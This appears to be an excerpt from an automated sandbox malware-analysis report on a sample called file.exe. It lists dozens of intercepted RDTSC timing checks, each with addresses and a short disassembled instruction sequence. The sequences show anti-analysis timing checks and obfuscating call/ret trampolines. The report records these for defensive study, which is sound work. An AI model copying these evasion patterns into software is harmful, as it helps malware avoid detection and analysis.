            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD972 second address: FBD9DE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD888D50BE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FD888D50BE8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007FD888D50BE8h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov dword ptr [ebp+12455242h], esi 0x00000047 push 00000000h 0x00000049 or bx, FBAEh 0x0000004e xchg eax, esi 0x0000004f jmp 00007FD888D50BF0h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD9DE second address: FBD9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD9E2 second address: FBD9E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD9E6 second address: FBD9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC082A second address: FC082E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2849 second address: FC28AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FD888F38A28h 0x0000000b popad 0x0000000c nop 0x0000000d sub dword ptr [ebp+122D328Fh], esi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FD888F38A28h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1CE3h], edi 0x00000035 push 00000000h 0x00000037 movzx ebx, cx 0x0000003a xchg eax, esi 0x0000003b jns 00007FD888F38A31h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 ja 00007FD888F38A2Ch 0x0000004a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3826 second address: FC3886 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD888D50BF5h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D3A1Ah], edi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FD888D50BE8h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov bl, 84h 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 mov ax, 1A43h 0x00000039 cld 0x0000003a popad 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d push ebx 0x0000003e pushad 0x0000003f popad 0x00000040 pop ebx 0x00000041 pushad 0x00000042 push eax 0x00000043 pop eax 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3886 second address: FC3895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC59E4 second address: FC5A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jmp 00007FD888D50BF8h 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jg 00007FD888D50BE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5A10 second address: FC5A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6AFD second address: FC6B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6B01 second address: FC6B73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, edx 0x0000000f push 00000000h 0x00000011 jne 00007FD888F38A2Bh 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FD888F38A28h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 pushad 0x00000034 mov eax, dword ptr [ebp+122D1E01h] 0x0000003a mov dword ptr [ebp+122D3449h], edi 0x00000040 popad 0x00000041 mov dword ptr [ebp+122D1F92h], esi 0x00000047 push eax 0x00000048 push edi 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FD888F38A2Bh 0x00000050 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5E07 second address: FB5E0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8AB7 second address: FC8ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8ABB second address: FC8B59 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD888D50BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FD888D50BE8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 je 00007FD888D50BECh 0x0000002e mov dword ptr [ebp+1246251Ch], ecx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007FD888D50BE8h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 pushad 0x00000051 and di, 99CCh 0x00000056 call 00007FD888D50BECh 0x0000005b mov dword ptr [ebp+122D2511h], edi 0x00000061 pop ecx 0x00000062 popad 0x00000063 push 00000000h 0x00000065 jbe 00007FD888D50BF2h 0x0000006b jnl 00007FD888D50BECh 0x00000071 jc 00007FD888D50BE6h 0x00000077 xchg eax, esi 0x00000078 push eax 0x00000079 push edx 0x0000007a jne 00007FD888D50BF0h 0x00000080 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBAE04 second address: FBAE09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBAE09 second address: FBAE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FD888D50BF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBAE2D second address: FBAE36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBBBB1 second address: FBBBB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBBBB5 second address: FBBBB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBBBB9 second address: FBBBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, edx 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov dword ptr fs:[00000000h], esp 0x00000018 xor bl, 0000003Ch 0x0000001b mov eax, dword ptr [ebp+122D0B79h] 0x00000021 mov edi, 3AC92E0Ah 0x00000026 push FFFFFFFFh 0x00000028 and edi, dword ptr [ebp+122D3D6Ah] 0x0000002e nop 0x0000002f push ecx 0x00000030 pushad 0x00000031 jp 00007FD888D50BE6h 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F623D2 second address: F623D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F623D6 second address: F623DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F623DC second address: F62436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD888F38A2Ch 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FD888F38A2Eh 0x00000014 jng 00007FD888F38A26h 0x0000001a popad 0x0000001b popad 0x0000001c je 00007FD888F38A65h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD888F38A38h 0x00000029 jmp 00007FD888F38A2Fh 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC39F2 second address: FC3A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD888D50BF6h 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3A12 second address: FC3A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3A1E second address: FC3A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD0E27 second address: FD0E3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jne 00007FD888F38A26h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FD888F38A26h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD0E3B second address: FD0E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD0E3F second address: FD0E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD0FB9 second address: FD0FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7C8E second address: FC7C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7C94 second address: FC7C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5708 second address: FD572E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push ebx 0x00000009 jnc 00007FD888F38A26h 0x0000000f pop ebx 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FD888F38A2Bh 0x0000001a mov eax, dword ptr [eax] 0x0000001c push esi 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7E44 second address: FD7E60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BF8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7E60 second address: FD7E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7E66 second address: FD7E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD888D50BE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7E72 second address: FD7E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5EBF4 second address: F5EC29 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD888D50BE6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FD888D50BF0h 0x00000012 jmp 00007FD888D50BF6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5EC29 second address: F5EC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5EC37 second address: F5EC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5EC3B second address: F5EC3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5EC3F second address: F5EC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD2E3 second address: FDD2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD2E7 second address: FDD2ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD920 second address: FDD925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD925 second address: FDD92A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD92A second address: FDD930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDDB9D second address: FDDBA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDDBA1 second address: FDDBB0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD888F38A26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDDD02 second address: FDDD0E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD888D50BE6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDDD0E second address: FDDD45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD888F38A37h 0x00000008 jmp 00007FD888F38A2Bh 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD888F38A2Bh 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDDD45 second address: FDDD49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDDE95 second address: FDDE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDDE99 second address: FDDE9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDDE9D second address: FDDEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDDEA7 second address: FDDEAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDDEAD second address: FDDEB7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD888F38A2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE2B5 second address: FDE2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD888D50BF5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE2D0 second address: FDE2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD888F38A2Eh 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE47A second address: FDE49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007FD888D50BE6h 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FD888D50BF5h 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE44A8 second address: FE44AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE473F second address: FE4743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4743 second address: FE4747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4747 second address: FE4768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD888D50BF9h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4768 second address: FE476C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4A04 second address: FE4A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4A08 second address: FE4A3C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop esi 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FD888F38A2Ch 0x00000013 jnp 00007FD888F38A26h 0x00000019 ja 00007FD888F38A3Bh 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4A3C second address: FE4A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4A42 second address: FE4A4C instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD888F38A26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4BC5 second address: FE4BF0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD888D50BFAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jng 00007FD888D50BE6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4BF0 second address: FE4C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD888F38A37h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4C0C second address: FE4C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4D6F second address: FE4D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4D75 second address: FE4D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5187 second address: FE5193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007FD888F38A26h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE52B7 second address: FE52C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FD888D50BE6h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96569 second address: F96573 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD888F38A2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEFAA second address: FEEFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF2BF second address: FAF2C9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD888F38A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF3C4 second address: FAF3C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFEC3 second address: F96565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c stc 0x0000000d lea eax, dword ptr [ebp+124839E5h] 0x00000013 or edx, 28AEF8B0h 0x00000019 push eax 0x0000001a push ecx 0x0000001b pushad 0x0000001c jmp 00007FD888F38A34h 0x00000021 jbe 00007FD888F38A26h 0x00000027 popad 0x00000028 pop ecx 0x00000029 mov dword ptr [esp], eax 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007FD888F38A28h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D3998h], eax 0x0000004c call dword ptr [ebp+12466E64h] 0x00000052 pushad 0x00000053 je 00007FD888F38A2Eh 0x00000059 pushad 0x0000005a popad 0x0000005b jnc 00007FD888F38A26h 0x00000061 jmp 00007FD888F38A36h 0x00000066 jmp 00007FD888F38A31h 0x0000006b popad 0x0000006c push eax 0x0000006d push edx 0x0000006e jng 00007FD888F38A2Eh 0x00000074 push ecx 0x00000075 pop ecx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96565 second address: F96569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE0F3 second address: FEE0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE0FB second address: FEE100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
